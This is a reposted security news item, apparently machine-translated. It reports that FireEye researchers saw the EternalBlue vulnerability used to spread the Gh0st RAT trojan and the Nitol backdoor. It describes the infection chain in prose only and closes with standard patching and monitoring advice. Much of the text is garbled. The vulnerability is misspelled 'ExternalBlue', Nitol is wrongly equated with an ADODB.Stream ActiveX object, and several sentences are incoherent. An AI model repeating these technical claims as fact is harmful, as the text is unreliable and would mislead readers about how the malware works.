“EternalBlue” vulnerability has been exploited to spread malware Gh0st RAT & Nitol backdoor – Penetration Testing

FireEye security researchers have recently discovered that ExternalBlue (Eternal Blue) vulnerabilities have been exploited by hackers using Nitol backdoor with malware Gh0st RAT.

Malware Gh0st RAT is a Trojan program for Windows, which is used primarily to attack government agencies, political activists and other political goals; Nitol backdoor is the same as the ADODB.Stream ActiveX Object that affects legacy Internet Explorer. Implementation of the vulnerability.

The hacker spread Nitol back door and malware Gh0st RAT used by the technology and blackmail the software WannaCry is more similar. Once the machine is successfully infected, the malicious program will first automatically open a shell and write instructions to the VBScript file, and then execute the program to obtain another server in the payload.

Figure: EternalBlue “Eternal Blue” utilization mechanism

Researchers have now detected some malicious samples in Singapore and South Asia. Security experts predict that in the next few weeks or months, or there will be more attackers using different payload will Nitol back door and malicious software Gh0st RAT spread to the rest of the world. Security experts recommend that users in addition to the system and the network for routine patch management, the system administrator also need to enable intrusion detection and prevention system, disable obsolete or unnecessary protocol and port, take the initiative to monitor network traffic, protection endpoint and deployment of security mechanisms.

FireEye detailed study report please poke here .

The post “EternalBlue” vulnerability has been exploited to spread malware Gh0st RAT & Nitol backdoor appeared first on Penetration Testing. http://ift.tt/2rx1oh3 http://ift.tt/2aM8QhC

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s